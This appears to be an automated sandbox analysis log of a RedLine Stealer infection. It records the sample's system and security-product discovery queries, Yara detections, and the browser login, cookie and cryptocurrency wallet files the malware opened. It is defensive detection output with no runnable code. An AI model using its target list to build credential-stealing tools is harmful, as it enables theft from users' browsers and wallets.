Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00350030 GetLocalTime,__swprintf,

20_2_00350030

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00350722 GetUserNameW,

20_2_00350722

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0034416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

20_2_0034416A

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00325D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

20_2_00325D13

Source: C:\Windows\System32\OpenSSH\sftp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 25.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 8800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 9132, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Source: AutoIt3.exe	Binary or memory string: WIN_81
Source: AutoIt3.exe	Binary or memory string: WIN_XP
Source: AutoIt3.exe	Binary or memory string: WIN_XPe
Source: AutoIt3.exe	Binary or memory string: WIN_VISTA
Source: AutoIt3.exe	Binary or memory string: WIN_7
Source: AutoIt3.exe	Binary or memory string: WIN_8
